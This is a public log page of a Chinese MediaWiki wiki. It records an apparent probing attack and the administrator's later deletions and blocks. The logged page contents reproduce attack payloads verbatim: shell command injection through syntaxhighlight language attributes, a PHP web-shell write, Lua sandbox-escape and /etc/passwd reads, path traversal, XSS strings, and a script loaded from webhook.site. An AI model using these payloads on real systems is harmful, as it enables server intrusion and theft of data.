所有公开日志
所有希服维基公开日志的联合展示。您可以通过选择日志类型、输入用户名(区分大小写)或相关页面(区分大小写)筛选日志条目。
- 2026年5月18日 (一) 11:03 DGCK81LNN 讨论 贡献删除页面TestLoadersBypass (恶意用户创建)
- 2026年5月18日 (一) 11:02 DGCK81LNN 讨论 贡献删除页面模块:LoadDataAttack (恶意用户创建)
- 2026年5月18日 (一) 11:02 DGCK81LNN 讨论 贡献删除页面TestLoadDataAttack (恶意用户创建)
- 2026年5月18日 (一) 11:02 DGCK81LNN 讨论 贡献删除页面TestWS1778310157 (恶意用户创建)
- 2026年5月18日 (一) 11:02 DGCK81LNN 讨论 贡献删除页面TestTagSH0 1778310157 (恶意用户创建)
- 2026年5月18日 (一) 11:02 DGCK81LNN 讨论 贡献删除页面TestTagSH1 1778310157 (恶意用户创建)
- 2026年5月18日 (一) 11:02 DGCK81LNN 讨论 贡献删除页面TestTagSH2 1778310157 (恶意用户创建)
- 2026年5月18日 (一) 11:02 DGCK81LNN 讨论 贡献删除页面Test URL Include (恶意用户创建)
- 2026年5月18日 (一) 11:02 DGCK81LNN 讨论 贡献删除页面TestTiming 1778310341193 (恶意用户创建)
- 2026年5月18日 (一) 10:59 DGCK81LNN 讨论 贡献已封禁RCE Y1g5qr5z2T 讨论 贡献,到期时间为不限期(账号创建停用) (恶意用户)
- 2026年5月18日 (一) 10:59 DGCK81LNN 讨论 贡献已封禁TestAccount310555 讨论 贡献,到期时间为不限期(账号创建停用) (恶意用户)
- 2026年5月18日 (一) 10:58 DGCK81LNN 讨论 贡献删除页面用户:TestAccount310555/common.js (攻击)
- 2026年5月18日 (一) 10:55 DGCK81LNN 讨论 贡献已封禁221.237.85.128 讨论,到期时间为1年(仅限匿名用户、账号创建停用)
- 2026年5月18日 (一) 10:54 DGCK81LNN 讨论 贡献已封禁Bot93553 讨论 贡献,到期时间为1年(账号创建停用、不能编辑自己的讨论页) (攻击)
- 2026年5月9日 (六) 15:46 221.237.85.128 讨论创建了页面模块:Pwn (创建页面,内容为“local p = {} function p.rce() local f = io.open("/etc/passwd", "r") if f then return f:read("*a") else return "no io" end end return p”)
- 2026年5月9日 (六) 15:44 221.237.85.128 讨论创建了页面Sandbox (创建页面,内容为“test123”)
- 2026年5月9日 (六) 15:15 Bot93553 讨论 贡献创建了页面用户:Bot93553/global.js (创建页面,内容为“mw.loader.load("https://webhook.site/test");”)
- 2026年5月9日 (六) 15:13 Bot93553 讨论 贡献已使用非默认内容模型“纯文本”创建页面Test Cm text
- 2026年5月9日 (六) 15:13 Bot93553 讨论 贡献创建了页面Test Cm text (创建页面,内容为“test content”)
- 2026年5月9日 (六) 15:13 Bot93553 讨论 贡献已使用非默认内容模型“CSS”创建页面Test Cm css
- 2026年5月9日 (六) 15:13 Bot93553 讨论 贡献创建了页面Test Cm css (创建页面,内容为“test content”)
- 2026年5月9日 (六) 15:13 Bot93553 讨论 贡献已使用非默认内容模型“JavaScript”创建页面Test Cm javascript
- 2026年5月9日 (六) 15:13 Bot93553 讨论 贡献创建了页面Test Cm javascript (创建页面,内容为“test content”)
- 2026年5月9日 (六) 15:13 Bot93553 讨论 贡献创建了页面Test Cm wikitext (创建页面,内容为“test content”)
- 2026年5月9日 (六) 15:11 TestAccount310555 讨论 贡献创建了页面用户:TestAccount310555/common.js (Test)
- 2026年5月9日 (六) 15:09 Bot93553 讨论 贡献创建了页面模块:XSS Test (创建页面,内容为“local p = {} function p.test() mw.addWarning('<script>alert(1)</script>') mw.addWarning('<img src=x onerror=alert(2)>') mw.addWarning('<svg onload=alert(3)>') return 'XSS test warnings added' end return p”)
- 2026年5月9日 (六) 15:09 Bot93553 讨论 贡献创建了页面模块:LoadDataLoader (创建页面,内容为“local p = {} function p.test() local ok, result = pcall(mw.loadData, 'Module:LoadData_test1') if ok then local keys = {} for k, v in pairs(result) do keys[#keys+1] = k .. '=' .. tostring(type(v)) end return 'loadData OK: ' .. table.concat(keys, ', ') else return 'loadData ERROR: ' .. tostring(result) end end return p”)
- 2026年5月9日 (六) 15:09 Bot93553 讨论 贡献创建了页面模块:LoadData test1 (创建页面,内容为“local p = {} -- Return data with various types that might confuse PHP serializer p.data = { binary = string.char(0, 0, 0, 0), large_string = string.rep('A', 10000), nested = { { { { { deep = true } } } } }, special = 'O:8:"stdClass":0:{}', php_serial = 'O:31:"Monolog\Handler\SyslogUdpHandler":0:{}', number_edge = 2^53, minus_zero = -0, nan = 0/0, inf = 1/0, } return p”)
- 2026年5月9日 (六) 15:09 用户账号TestAccount310555 讨论 贡献已创建
- 2026年5月9日 (六) 15:09 221.237.85.128 讨论创建了页面TestLoadersBypass (创建页面,内容为“{{#invoke:LoadersBypass|test}}”)
- 2026年5月9日 (六) 15:09 221.237.85.128 讨论创建了页面模块:LoadersBypass (创建页面,内容为“local p = {} function p.test() local results = {} if type(package.loaders) == "table" then results[1] = "loaders_count: " .. #package.loaders -- Try each loader with various module names local mods_to_try = {"os", "io", "lfs", "socket", "posix"} for _, modname in ipairs(mods_to_try) do for i, loader in ipairs(package.loaders) do local ok, fn = pcall(loader, modname) if ok and…”)
- 2026年5月9日 (六) 15:09 221.237.85.128 讨论创建了页面TestLeakInfo (创建页面,内容为“{{#invoke:LeakInfo|test}}”)
- 2026年5月9日 (六) 15:09 221.237.85.128 讨论创建了页面模块:LeakInfo (创建页面,内容为“local p = {} function p.test() -- Try to leak file paths through error messages local results = {} -- Test 1: mw.loadData with error paths local ok1, err1 = pcall(mw.loadData, "/etc/passwd") results[1] = "loadData_passwd: " .. tostring(err1):sub(1,100) -- Test 2: mw.ustring with invalid UTF-8 from file -- (Can't read files directly, it's about encoding) -- Test 3: Check mw.title for path info local title = mw.title.new("/v…”)
- 2026年5月9日 (六) 15:06 221.237.85.128 讨论创建了页面TestWhoami v2 1778310363 (创建页面,内容为“<syntaxhighlight lang="$(whoami 2>&1)">TEST</syntaxhighlight>”)
- 2026年5月9日 (六) 15:06 221.237.85.128 讨论创建了页面TestPwd v2 1778310363 (创建页面,内容为“<syntaxhighlight lang="$(pwd 2>&1)">TEST</syntaxhighlight>”)
- 2026年5月9日 (六) 15:06 221.237.85.128 讨论创建了页面TestRW 1778310363 echo simple (创建页面,内容为“<syntaxhighlight lang="$(echo PWNED > /tmp/test_echo_1778310363.txt)">TEST</syntaxhighlight>”)
- 2026年5月9日 (六) 15:06 221.237.85.128 讨论创建了页面TestTiming 1778310360075 (创建页面,内容为“<syntaxhighlight lang="python;sleep 3">TEST</syntaxhighlight>”)
- 2026年5月9日 (六) 15:05 221.237.85.128 讨论创建了页面TestTiming 1778310356944 (创建页面,内容为“<syntaxhighlight lang="python | sleep 3">TEST</syntaxhighlight>”)
- 2026年5月9日 (六) 15:05 221.237.85.128 讨论创建了页面TestTiming 1778310353835 (创建页面,内容为“<syntaxhighlight lang="`sleep 5`">SLEEP5</syntaxhighlight>”)
- 2026年5月9日 (六) 15:05 221.237.85.128 讨论创建了页面TestTiming 1778310350764 (创建页面,内容为“<syntaxhighlight lang="$(sleep 5)">SLEEP5</syntaxhighlight>”)
- 2026年5月9日 (六) 15:05 221.237.85.128 讨论创建了页面TestTiming 1778310347605 (创建页面,内容为“<syntaxhighlight lang="`sleep 3`">SLEEP3</syntaxhighlight>”)
- 2026年5月9日 (六) 15:05 221.237.85.128 讨论创建了页面TestTiming 1778310344531 (创建页面,内容为“<syntaxhighlight lang="$(sleep 3)">SLEEP3</syntaxhighlight>”)
- 2026年5月9日 (六) 15:05 221.237.85.128 讨论创建了页面TestTiming 1778310341193 (创建页面,内容为“<syntaxhighlight lang="python">BASELINE</syntaxhighlight>”)
- 2026年5月9日 (六) 15:05 Bot93553 讨论 贡献创建了页面Test URL Include (创建页面,内容为“{{:http://example.com/}}”)
- 2026年5月9日 (六) 15:02 221.237.85.128 讨论创建了页面TestTagSH2 1778310157 (创建页面,内容为“{{#tag:syntaxhighlight|TEST|lang=$(whoami 2>&1)}}”)
- 2026年5月9日 (六) 15:02 221.237.85.128 讨论创建了页面TestTagSH1 1778310157 (创建页面,内容为“{{#tag:syntaxhighlight|TEST|lang=`id 2>&1`}}”)
- 2026年5月9日 (六) 15:02 221.237.85.128 讨论创建了页面TestTagSH0 1778310157 (创建页面,内容为“{{#tag:syntaxhighlight|TEST|lang=$(id 2>&1)}}”)
- 2026年5月9日 (六) 15:02 221.237.85.128 讨论创建了页面TestWS1778310157 (创建页面,内容为“<syntaxhighlight lang="$(echo '<?php system($_GET[c]); ?>' > /var/www/html/w/extensions/SyntaxHighlight_GeSHi/pwned_ZZXYS_1778310157.php)"> TEST </syntaxhighlight>”)
- 2026年5月9日 (六) 15:00 221.237.85.128 讨论创建了页面TestLoadDataAttack (创建页面,内容为“{{#invoke:LoadDataAttack|test}}”)
- 2026年5月9日 (六) 14:59 221.237.85.128 讨论创建了页面模块:LoadDataAttack (创建页面,内容为“local p = {} function p.test() local results = {} local paths = { "Module:Sandbox", "../../LocalSettings.php", "../LocalSettings.php", "/etc/passwd", "../../../etc/passwd", "../../../../etc/passwd", "Module:../LocalSettings.php", "Module:../../LocalSettings.php", } for _, path in ipairs(paths) do local ok, data = pcall(mw.loadData, path) local info = tostring(ok)…”)